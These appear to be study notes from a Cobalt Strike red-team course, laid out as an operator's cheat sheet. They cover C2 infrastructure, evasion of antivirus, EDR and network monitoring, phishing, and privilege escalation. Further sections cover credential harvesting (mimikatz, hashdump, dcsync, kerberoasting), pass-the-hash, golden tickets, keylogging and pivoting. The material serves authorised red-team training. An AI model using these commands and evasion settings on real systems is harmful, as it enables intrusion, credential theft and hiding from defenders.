Red Team Operations with Cobalt Strike (2019)
February 16, 2021 · View on GitHub
Introduction
Red Team Goals
- Initial Access - Difficulties: AVs, Access Whitelists, EDR (Local Agent), Telemetry of the Event sent to a SOC that detects the malicious intent...
- Code Executing - Difficulties: Firewalls, Proxies, Network Security Monitoring, TI...
- Positive Control (C2) - Difficulties: EDR, Telemetry...
- Post-Exploitation - Difficulties: EDR, Telemetry...
Attack Chain
- DMARC, DKIM, SPF
- Mail Anti-Virus Gateway
- Artifact on Target
- Endpoint Security
- Application Whitelisting
- Instrumentation & Telemetry
- Code Execution
- Firewall and Proxy
- Network Security Monitoring
- Positive C&C
- Post Exploitation
- Instrumentation and Telemetry
How to succeed at evasion:
- Know your tools and behaviors
- Assess and understand the defenses
- Decide the best option to use
Operations
Beacon
Cobalt Strike's Payload.
-
It has two Communication Strategies:
- Asynchronous -> "Low and Slow"
- Interactive -> Real-Time Control
-
It uses HTTP/S or DNS to egress a network.
-
It uses SMB or TCP for peer-to-peer C2.
-
It has Remote Administration Tool Features.
Malleable C2
A domain-specific language to give you control over the indicators in the Beacon payload.
- Network Traffic
- In-memory Content, Characteristics and Behavior
- Process Injection Behavior
Aggressor Script
The scripting language built into Cobalt Strike v3.0 and later. It allows you to modify and extend the Cobalt Strike client, such as adding pop-up menus, defining new commands, responding to events... Aggressor Script
Structure
Server - Team Server
./teamserver <IP> <Password> [Path to Malleable C2 Profile] [Kill Date for Beacon Payloads - YYYY-MM-DD] - To start the Team Server
Client - Target
./cobaltstrike - Starts the CS GUI Client. After inputing the connection information for the Team Server, it connects to it.
-
The 'Event Log' can be used to send messages to the Team (Collaboration feature).
-
A Client can connect to multiple Team Servers at the same time:
- Cobalt Strike > New Connection - To connect to multiple Team Servers
- Cobalt Strike > Close - To close a connection
- [Team Server Button (at the bottom)] > Rename - To rename a Server
Multiple Team Servers is ideal because it is very probable that the first Server used for exploitation is discovered and shutdown, so dividing the tasks between Servers along the way will help in maintaining access to the target network.
Scaling Red Ops
- Target Cells
- Responsibble for objectives on specific networks
- Gain access, post-exploitation and spreading laterally
- Maintain local infrastructure these tasks
- Access Management Cell - It scales very well, it can handle many target cells
- Holds accesses for all networks
- Gain access and receivbe access from cells
- Pass accesses to target cells as needed
- Maintain global infrastructure for persistent callbacks
Team Roles
- Access
- Get in and expand foothold
- Post-Exploitation
- Data Mining
- Monitor Users
- Keylogging
- Screenshots
- ...
- Local Access Manager (Shell Sherpa)
- Manage Callbacks
- Setup Infrastructure
- Persistence
- Pass Sessions to and from the Global Access Manager
Logs
CS logs everyting on the Team Server under the folder logs/.
Reports
CS has a Reporting menu. It can output as PDF and MS Word, generate custom reports and change logo, merges data from multiple Team Servers...
Infrastructure
Listener
A configuration for a CS Payload (and Payload Server). The name of the listener must be descriptive enough so that other teammates can understand which listener is which and for what it is used.
-
Types of Listeners:
- Egress: Payload that beacons out of a network
- Peer-to-Peer: Payload that communicates through a parent payload
- Alias: Reference to a payload handler elsewhere, for instance, in another toolset
-
'Cobalt Strike' > 'Listeners' - To manage the listeners
Payload Staging
-
Stager: Tiny program that downloads a payload and passes execution to it. It is needed for size-constrained attacks because of the limitation of space.
-
Stageless Payload: Payload without a stager. It is more commonly used nowadays.
-
Stagers are:
- Less secure
- More brittle
- Easier to detect
CS is compatible with Metasploit payloads. It is also compatible with 'Foreign Listeners', other tools, like Metasploit, can be used to listen (open a session) to a CS payload.
HTTP(/S) Beacon
The client will periodically make HTTP GET requests to the CS C2 (Controller) asking for 'something to do'. If the C2 responds with 'No', the client will go to sleep until next time it sends the request. When the client asks and the C2 has an action for it to perform, it sends the payload data. When the action is performed, the client will send back the result in an HTTP POST request (If there is no output, there's no HTTP POST request).
The HTTPS Beacon works just the same, but with an SSL certificate.
Listener Attacks
After configuring the listener, we can configure the attacks to send.
- 'Attacks' > 'Web Drive-By' > 'Scripted Web Delivery (S)' - Provides a one-liner that downloads the file with the configured payload.
- Run it on the victim machine - The Beacon listener will be activated
Redirectors
To forward traffic to the CS Team Server.
-
Iptables, socat... -
socat TCP4-LISTEN:80,fork TCP4:<Team Server IP>:80 -
Apache or Nginx Reverse Proxy config
-
CDN (Content Delivery Network) as a redirector for HTTPS traffic
- Use a valid SSL certificate
- Allow HTTP POST and GET verbs
- Consider HTTP-GET only C2
- Disable all cache options
- Be aware of transformed requests!
Listing what's Running on a Local Port
netstat -nap | grep <Port>
Running commands on the Background
$ screen$ <Command>- Ctrl+Z - To send the command to the background
$ bg- To list the processes running in the background$ screen -d- To detach from the session
Domain Fronting
The CDN looks at the 'Host' header in an HTTP request from a client to determine which origin Server to pull from if the content is not in its cache. Domain Fronting takes advantage of this by making the HTTP Beacon client ask for the right domain, but changing the 'Host' header of the HTTP request to that of the C2, so that the request is pulled from the C2 instead of the original Server. In CS you can configure it in the 'HTTP Host Header' parameter on the listener.
HTTPS is more desirable in this scenario because some Proxies (& browsers?) when they notice the difference between the URL and the 'Host' header they automatically fix it, but in HTTPS, as the connection is encrypted, they can't do it so it arrives to the CDN untouched. (It can be fixed by Proxies that MiTM all the traffic of their organization, even the HTTPS traffic. But it is not done, in some cases, for client confidentiality reasons (finance, healthcare...), making it vulnerable to Domain Fronting).
Another mitigation: In HTTPS, in the TLS header, there's the SNI field, that has the value of the 'Host' header, if the CDN looks at this value, it can notice the difference.
DNS Beacon
Payload that uses DNS lookups to communicate with the CS Team Server. It takes advantage of the recursive DNS query, making the query arrive to the CS Team Server that acts as a DNS Server (Listener - Payload: Beacon DNS), responding with a malicious response.
Modes to transmit the DNS records with the tasks:
- Mode: 'dns' -> DNS A Record
- Mode: 'dns6' -> DNS AAAA Record
- Mode: 'dns-txt' -> DNS TXT Record
After configuring the DNS Beacon Listener, and luring the victim to execute the one-liner in their machine, a 'Ghost Beacon' will appear on CS. It is not a ghost, it's just that we don't have the machine's metadata yet. To do so, we need for them to request a query, and interact with the CS TS, so just right-click on it and select 'Interact', enter a command such as 'sleep 5', and then the metadata for that Beacon will appear and will perform the actions instructed.
SMB Beacon
Payload that uses name pipes to communicate peer-to-peer. Example: Target network where only one node is communicating with the CS Team Server, via DNS or HTTP Beacon, and then communicates with the other nodes in the network with the SMB Beacon, and communicates the actions from and to the CS Team Server of all the subnodes in the network. (Listener - Payload: Beacon SMB)
To assume control of an SMB Beacon:
- Connect to a Beacon peer -
link <host> <pipe> - Disconnect from a Beacon peer -
unlink <host> <pid>
To see the 'Parent - Child' relationships between SMB Beacons, go to 'Cobalt Strike' > 'Visualization' > 'Pivot Graph'.
TCP Beacon
Conceptually, is similar to SMB Beacon. (Listener - Payload: Beacon TCP)
To assume control of an TCP Beacon:
- Connect to a Beacon peer -
connect <host> <port> - Disconnect from a Beacon peer -
unlink <host> <pid>
External C2
Specification that allows a third-party program or toolchain to control a Beacon and relay back to the CS Team Server. (Listener - Payload: External C2)
C2 (Control)
Malleable C2
A domain-specific language to give you control over the indicators in the Beacon payload.
In the Beacon payload you can change:
- Network traffic
- In-memory content, characteristics and behavior
- Process injection behavior
./teamserver <IP> <Password> <Malleable C2 Profile> - To start a Team Server with a Malleable C2 Profile
Components of the profile
- Options -
set <key - http parameter> "<value>"- Ex.set useragent "Mozilla/5.0",set uri "/image/" - Blocks - Groups indicators. There's three types:
- http-get {} - Downloads tasks
- client - HTTP Request
- server - HTTP Response
- http-post {} - Controls how Beacons upload output to the CS TS
- client: id, output
- server
- http-stager {} - Shapes the content of the staging process
- http-config {} - Consistent service headers. "Global Server config"
- https-certificate {} - To configure the SSL certificate
- http-get {} - Downloads tasks
- Extraneous Indicators - Way of decorating aspects of a transaction (HTTP Headers) -
header "<key>" "<value>" - Transforms - Way of taking data that a Beacon has to send and transforms the way of dictating how the Beacon should transform the data to store it and send it - Ex.
metadata { netbios #It netbios-encodes the data; append "-.jpg"; uri-append;}- This block can be followed to encode and recover the data, to encode read it from the top to the bottom, and to recover it, do it the other way round.
To test a new profile before using it
./c2lint <Profile>
Egress and Network Evasion
Steps to ensure that you have positive C2 over the Beacon payload.
The C2 Problem Set
- Deny all outbound traffic
- Allow egress only through a proxy device
- Attack traffic must conform to expected protocol
- Must pass other checks as well...
- Evade monitoring which may look for
- Known IOCs or suspicious IOCs in requests - IOC = Indicator of Compromise
- Infrastructure being identified as Cobalt Strike before use - It's best to use customized CS profiles
Profile Evasion Tips
- Don't use public profile examples - Use a customized profile
- Don't allow empty server responses
- 'prepend' -> To add junk data
- 'mask' -> To randomize the data
- Change URIs and use 'prepend' to mask IOCs in the http-stager block - Ex. Don't use the 'application/octet-stream' value as it is detected as suspicious.
- Use the http-config block to standardize server headers and header order in all HTTP server responses
- Use plausible 'set useragent' values
- Use 'HTTP Get-Only' C2 for difficult egress situations - Best chance to get Command & Control (C2)
Network Security Monitoring
- Use an Apache, Nginx or a CDN as a redirector
- Invest in your infrastructure
- Host redirectors on different providers
- Domains are better with age and categorization
- Do not use IPv4 addresses for C2
- Use a valid SSL certificate
- Operate "low and slow"
- High Beacon sleep interval
DNS C2 Detections / Preventions
- Split-Split DNS - Organizations only allowing internal hosts to access an internal DNS Server that does not resolve to external queries
- Don't use DNS C2
- Volume of requests
- Use DNS C2 as "low&slow" fallback option only
- CS DNS C2 IOCs
- Set 'dns_stager_prepend' and 'dns_stager_subhost'
- Bogon IP Address - Looking at responses and identifying non-valid IP address responses, such as 0.0.0.0
- Change 'dns_idle' in profile
- Avoid 'mode dns' - The IP Address field is used to send data back to the C2
- Length of request hostnames
- Set 'dns_max_txt' to limit the TXT length
- Set 'maxdns' to limit hostname length
Infrastructure OPSEC
Having your C2 Server identified as a CS Server by online threat intelligence sites like 'Censys'.
-
How to find CS Team Servers on the Internet / Countermeasures
- Look for the default CS Self-Signed SSL Certificate
- Use a valid SSL Certificate
- Use Apache, Nginx or a CDN as a redirector
- Only allow HTTP/S connections from redirectors
- 0.0.0.0 DNS Responses
- Set 'dns_idle' in Malleable C2 to avoid 0.0.0.0 IP Address responses
- Open port 50050
- Firewall port 50050 and access via SSH Tunnel
- Empty index page, 404, Content-Type: text/plain
- Host content on your redirectors
- Payload config available to anyone
- Set 'host_stage' to 'false' in Malleable C2 - But it loses the ability of 'staging'
- Look for the default CS Self-Signed SSL Certificate
-
How to verify a CS Team Server
wget -U "Internet Explorer" http://<server>/vl6D- Issuing a request for a payload
Beacon Payload Security Features
- Beacon payload authenticates the Team Server
- Beacon tasks and output are encrypted
- Beacon has replay protection for tasks
- Payload stagers do not have security features
Weaponization
- Artifact: File that embeds something that will run a payload. It creates space in memory, copies the payload (or the stager that then will call the payload) and pass execution to where the payload resides in memory.
Hosting Files in the CS Web Server
- 'Attacks' > 'Web Drive-By' > 'Host File' - To host a file
- 'Attacks' > 'Web Drive-By' > 'Manage' - To manage and remove hosted files
- 'View' > 'Web Log' - To see the web server activity
Artifact Kit
It is a source code Framework to generate EXEs, DLLs and Service EXEs. ('Help' > 'Arsenal' - To download it, then 'Modify and Build it' and finally, 'Cobalt Strike' > 'Script Manager' to load it.). It obfuscates known bad in unknown executables, fools AVs to stop emulating the executable, and de-obfuscates known bad and executes it.
Methods
Executables and DLLs
'Attacks' > 'Packages' > 'Windows EXE (S)' - Generate an executable or DLL for a Stageless Beacon
rundll32(/64/86).exe <whatever>.dll,StartW - To run the DLL
Run the application via a whitelisted program for a better result:
- MS Office Macro
- PowerShell
- LOLbins
- DLL Sideloading
Scripted Web Delivery
'Attacks' > 'Web Drive-By' > 'Scripted Web Delivery (S)' - Provides an executable one-liner
Resource Kit
It enables you to change the HTA, PowerShell, Python, VBA and VBS Script templates that CS uses in its workflows. 'Help' > 'Arsenal' to download it and modify 'resources.cna'. 'Cobalt Strike' > 'Script Manager' to load it.
User-Driven Attacks
'Attacks' > 'Packages'/'Web Drive-By'. Beware that these attacks use stagers.
- HTML Application - Resource Kit
- Java Signed Applet Attack - Applet Kit
- MS Office Document Macros - Resource Kit
- Windows Dropper - Artifact Kit
Metasploit Framework Exploits
Metasploit can be used to create payloads to be loaded into CS and downloadable from the victim.
Go Custom!
- 'Attacks' > 'Packages' > 'Windows EXE (S)' - To export a raw stageles artifact
- 'Attacks' > 'Packages' > 'Payload Generator' - To export a raw stager artifact
- Use with a third-party artifact or tool
- (Optional) Build a script to integrate
Tradecraft: Detections
Goal: Code Execution.
- EXE and Script Content
- Functions and strings from offense tools - Obfuscate
- Base64 encoded DLL or shellcode - Obfuscate
- Behavior
- Write a file to disk - Avoid
- Execute a program - Spoof parent PID
- Inject into new or existing process - Obfuscate
- Payload Content (Memory Injected DLL) - Evade
- Process Context
- explorer.exe, notepad.exe, powershell.exe, rundll32.exe, svchost.exe - Avoid
- Commonly abused applications - Avoid
In-Memory Detection Strategies
- Thread Start Address
- No module associated with the start address
- Memory Permissions
- RWX, RWX permissions
- Odd 'AllocationProtect, Protect' pairs
- Memory Content
- Signs of a PE file
- Strings associated with toolset or common techniques
Malleable PE
Extends Malleable C2 to modify Beacon's DLL, such as:
- Prepending and appending data
- Replacing strings
- Embedding arbitrary strings
- Edit PE header fields
- Set PE loader hints to enable obfuscations
In-Memory Detection Evasions
- Thread Start Address
- Depends on the artifact or process injection routine that ran the Beacon payload
- Memory Permissions
- Avoid artifacts that use RWX permissions
- Avoid the use of stagers - they always allow the RWX permissions
- Set 'userwx' to 'false' in Malleable C2 profile
- Turn on module stomping: Set 'module_x86' and 'module_x64' to a 'large unused DLL' in profile.
- Memory Content
- Set 'image_size_x86' and 'image_size_x64'
- Use 'prepend' to offset PE in memory - needs valid x86 or x64 values
- Set 'obfuscate' to 'true'
- Set 'cleanup' to 'true'
- If needed, use 'strrep' to edit troublesome strings
- Set 'sleep_mask' to 'true'
Artifact Tradecraft
Avoid 'module-less threads' and 'RWX memory'.
Initial Access
Client-Side Attacks
Making the user create the initial access to the CS Team Server. Ex. E-mail with a malicious file.
Steps:
- Map the client-side attack surface
- Create a VM for testing purposes
- Use the VM to best select the attack
- Configure and disguise the attack
- Email attack package to the victim
Spear Phishing
Getting the weaponized content to the target.
Steps:
- Create a target list
"targets.txt":
... - Create a template
- Choose mail server to send through
- Send the message
Tradecraft
Nowadays, it's difficult that an email passes the securities imposed by the providers: Aggressive spam filtering, higher standards, email antivirus, DMARC (Domain-Based Message Authentication, Reporting and Conformance), DKIM (DomainKeys Identified Mail), SPF (Sender Policy Framework)...
Assume Breach
If you're in the network, know lateral creds but do not have access to CS: Windows 7 VM w/out AV and execute the payload there.
Post Exploitation
Beacon Management
- Access - Manipulate identity and privileges
- Explore - Control and gather data from the target
- Pivoting - Tunnel through this Beacon
- Session - Manage this access
Session Passing
- 'Beacon' > 'Spawn' or
spawn <arch> <listener>- To spawn and inject spawnu <pid> <listener>- To spawn with alternate parent and injectinject <pid> <arch> <listener>- To inject into a specific processspawnto <arch> <path> <args>- To change the program CS launches for temporary processes to try to avoid detection
Execute
execute-assembly <local path>/<file>.exe <args>- To use a .NET assembly through a Beaconshell <command> <args>- To run a command via cmd.exepowerpick <cmdlet> <args>- To use PowerShell without powershell.exepsinject <pid> <arch> <cmdlet> <args>- To run PowerShell within another process
File Browser
'Beacon' > 'Explore' > 'Browse Files'
User Exploitation
jobs- To list jobs in a Beaconjobkill <ID>- To stop a jobscreenshot <pid> <x86|x64> <time>- Deploy screenshot tool. Results at: 'View' > 'Screenshots'keylogger <pid> <x86|x64>- Deploy Keylogger. Results at: 'View' > 'Keystrokes'sleep 0ordesktop <pid> <arch> <low|high>- To watch or control a target's desktop
Tradecraft
-
Instrumentation and Telemetry
- Observable does not mean observed
- Evasion Strategies:
- Disable the instrumentation
- Spoof event properties to fool instrumentation
- Avoid OPSEC-expensive behaviors
- Adjust operations to blend in with legitimate activity or work within false positive exceptions
- Change offsense model
-
General Post-Exploitation Detections
- Behaviors (Event)
- Write a file to disk
- Execute a program
- Inject into new or existing processes
- Process Context (Event Property)
- explorer.exe, lsass.exe, notepad.exe, powershell.exe, rundll32.exe, svchost.exe
- Other commonly abused applications
- Post-exploitation tool - Memory Injected DLL (PiA)
- Behavior - Resolution of GetProcAddress and LoadLibrary -> Set 'post-ex' > 'smartinject' to True
- Thread Start Address - No module associated with the start address -> Controlled by 'process-inject' configuration
- Memory Permissions - RWX, RWX permissions. Odd 'AllocationProtect,Protect' pairs -> Controlled by 'process-inject' configuration
- Memory Content - Signs of a PE file, Strings associated with a toolset or common techniques -> Set 'post-ex' > 'obfuscate' to True
- PowerShell and .NET (Special Case)
- Functions, strings and patterns from offense tools -> Set 'post-ex' > 'amsi_disable' to True, use 'powerpick' or 'psinject' instead of 'powershell'
- Behaviors (Event)
Privilege Escalation
Escalation Options
elevate in the Beacon console to spawn an elevated session
runasadmin to run w/ elevated privileges
'Cobalt Strike' > 'Script Manager' > Load 'Elevate Kit' - Gives more elevation and runasadmin options
SharpUp
Privilege Escalation "vulnerability scanner" that looks for misconfigurations in the system.
execute-assembly /<local-path>/SharpUp.exe all
Kerberoasting
- Query the domain controller for accounts with SPNs (Service Principle Name) - service logon accounts associated with a service
- Request a TGS Ticket for the associated service
- Try to recover the password by cracking the TGS ticket - because part of it is encrypted with the domain user's password hash
execute-assembly /<local-path>/rubeus.exe kerberoast /outfile:hashes.txt
hashcat -m 13100 -a 0 --force -o <output>.txt <input - hashes.txt> <wordlist> - To crack the hashes
Bypass User Access Control (UAC) and Get SYSTEM
- Use
elevate uac-token-duplication <listener>- Fixed in Windows 10 RS5 (Oct 2018) - Use
runasadmin uac-cmstplua <command> - Use options in the Elevate Kit
Access Token
Concept not present in Linux, only Windows. It is a data structure managed within lsas, created after logon and associated with each process and thread, and persists in memory until reboot.
It contains:
- User and Group Information
- A list of privileges on the local computer
- Restrictions
- Reference to credentials
run whoami /priv - To get the privileges on the present token
getprivs - To enable the disabled privileges
The 'SYSTEM' token is one way to obtain full privileges over the machine.
getsystem - To search for and impersonate the SYSTEM token
elevate svc-exe <listener> - To spawn a session via a service executable
Credential and Hash Harvesting
logonpasswords- Recovers credentials - Risky, alternatives: 'GhostPack SafetyKatz.exe', 'Internal Monologue (current user)'hashdump- Recovers local account hashes - Risky, alternatives: 'dcsync', 'mimikatz !lsadump::sam(local)'
In CS, 'View' > 'Credentials' - To manage credentials
Mimikatz in Beacon
Mimikatz is a post-exploitation toolset for:
- Advanced Persistence
- Harvest 'Trust Material'
- Re-purpose 'Trust Material'
mimikatz <command> <arguments> - Run mimikatz command
mimikatz !<command> <arguments> - Elevate to SYSTEM and run mimikatz command
mimikatz @<command> <arguments> - Use current token to run mimikatz command
Lateral Movement
Lateral Movement in Windows Networks
- Reconnaissance: Targets and Users - Systems available for attack, admin users...
- Use 'Trust Material' to become 'Admin User' - Tokens, hashes, creds, kerberos tickets
- Attack - Steal files, run commands, execute payloads
- Recover more 'Trust Material' and repeat
Windows Enterprise
- Local User - Account on the system (.\user or COMPUTER\user)
- Domain User - User account on the domain controllers (DOMAIN\user)
- Local Administrator - User with admin rights on a system
- Domain Administrator - User with admin rights on the domain controller
Reconnaissance
- Windows Commands - net, nltest...
- Net Module - Beacon's built-in net commands
- PowerView -
powershell-import <path>/powerview.ps1thenpowershell <command> <arguments> - SharpView
Which Domain am I on?
- Windows -
run net view /DOMAIN - Net Module -
net domain - PowerView -
powershell Get-NetDomain
Which Hosts are Domain Controllers?
- Windows -
run /dclist:[DOMAIN],run net group "Domain Controllers" /DOMAIN - Net Module -
net dclist [DOMAIN],net domain_controllers [DOMAIN] - PowerView -
powershell Get-NetDomainController
Which Hosts are in the Domain without Scanning?
- Windows -
run net view /DOMAIN:[DOMAIN],run net group "Domain Computers" /DOMAIN - Net Module -
net view [DOMAIN],net computers [DOMAIN.FQDN] - PowerView -
powershell Get-NetComputer
Turn NetBIOS Name to IP Address
shell nslookup <NetBIOS Name>, shell ping -n 1 <NetBIOS Name>
How to Discover Domain Administrators
- Beacon's
runcommandnet group "enterprise admins" /DOMAINnet group "domain admins" /DOMAINnet localgroup "administrators" /DOMAIN
- Beacon's
netmodulenet group \\DC Domain Adminsnet localgroup \\DC Administrators
Local Administrators
It may be a Domain account or not!
- 'net' module can query local groups and users
net localgroup \\TARGETnet localgroup \\TARGET <group name>
- PowerView can find Local Administrators on a host
Get-NetLocalGroup -HostName TARGETInvoke-EnumerateLocalAdmin- On every host
Agentless Post Exploitation - No Payload Needed
- Use UNC path to reference files on another host
- List files in C:\foo on remote host -
shell dir \\host\C$\foo - Copy remote C:\foo\secrets.txt to current host -
shell copy \\host\C$\foo\secrets.txt - Go shopping for files on a remote host -
shell dir /S /B \\host\C$ > files.txt - WinRM (port 5985) can run commands to:
powershell Invoke-Command -ComputerName TARGET -ScriptBlock { Command } - Use PowerSploit to run Mimikatz over WinRM:
powershell-import <path>/Invoke-Mimikatz.ps1thenpowershell Invoke-Mimikatz -ComputerName TARGET - Use 'dcsync' to recover a password hash from a domain controller -
dcsync <domain> <DOMAIN\user> - Use 'dcsync' to recover dump password hashes from a domain controller -
dcsync <domain>
Trust Material
- Tokens
- Use
psto list processes - Use
steal_token <pid>to steal a token - Use
getuidto find out who you are - Use
rev2selfto drop the token
- Use
- Credentials
- Use
spawnas DOMAIN\user <password>- To spawn a Beacon with alternate creds - Use
make_token DOMAIN\user <password>- To create a token. Most commonly used command to create a token for a Beacon.
- Use
- Password Hashes
- Pass-the-Hash
- Use Mimikatz -
pth DOMAIN\user <ntlmhash>-> It starts a process with an access token populated with the username and the hash you provide. Then steals the token from that process. (Warning: This automation runs cmd.exe to pass a token back to the Beacon process, and it also interacts with LSASS)
- Use Mimikatz -
- Pass-the-Hash
- Kerberos Tickets
- Use
run klistto see which tickets are in your Kerberos tray - Use
kerberos_ticket_purgeto purge tickets - Use
kerberos_ticket_use <path>/<file>.ticketto load a ticket - 'Golden Ticket' - Self-generated Kerberos ticket with Domain Admin rights
- Forged with Mimikatz. It requires: the desired user and DOMAIN name, domain SID (
whoami /userand drop last full number), and the NTLM hash of krbtgt user from DC. - In CS: 'Beacon' > 'Access' > 'Golden Ticket'
- Forged with Mimikatz. It requires: the desired user and DOMAIN name, domain SID (
- Use
Remote Code Execution
jump- Lateral movement automationremote-exec- Bring your own weaponization
Pivoting
Port Scanning
portscan <hosts> <ports> <discover method: arp, icmp or none> <max nº of sockets open at once>
Proxy Pivoting
To go interactive: sleep 0.
Pivoting through SOCKS
- Tunnel traffic
- Set up a SOCKS4 proxy server tunneling through the current Beacon
socks <port>- Use
socks stopto kill the SOCKS proxy server
Tunneling Metasploit through Beacon
- Force the Metasploit Framework to use your SOCKS proxy server for connections. From msfconsole:
- `setg Proxies socks4:127.0.0.1:
setg ReverseAllowProxy true
- `setg Proxies socks4:127.0.0.1:
- To stop pivoting -
unsetg Proxies
Pivoting with ProxyChains
- Start a SOCKS Proxy Server
- Edit '/etc/proxychains.conf' to point to the server
- Use
proxychainsto tunnel traffic
Reverse Pivoting
- Tunnel Traffic (Reverse)
- Make the target listen on a port and tunnel the connection to another system
rportfwd <listening port> <forward host> <forward port>- Use
rportfwd stopto stop
- Make sure to account for firewall on the target!
Pivot Listeners
Way to turn a compromised system into a redirector that receives connections from the beacon payload. In CS: 'Beacon' > 'Pivoting' > 'Listener'.
SSH Sessions
Can be used to upload, download, execute and pivot (and encrypted communication). They are useful because they're on the target already.
- Use
dropbear SSHif a custom-configured agent is desired. ssh <target:port> <username> <password>- To launch an SSH session with credentialsssh-key <target:port> <username> <path>/<key>- To launch an SSH session with key authentication
Post Exploitation in SSH Sessions
shell <command> <args>- Run a commandsudo <password> <command> <args>- Run a command with sudoupload <local file path>download <file>socks 1234- Start SOCKS pivotingrportfwd <listening port> <forward host> <forward port>- Reverse Port forwardconnect <host> <port>- Connect to a TCP Beacon- 'Session' > 'Pivoting' > 'Listener' - To create a Reverse TCP Beacon Pivot Listener
Browser Privoting
Way to inherit a user's access to sites by relaying requests through their browser. Only available in IE.
browserpivot <pid> x86 or 'Beacon' > 'Pivoting' > 'Browser Pivot'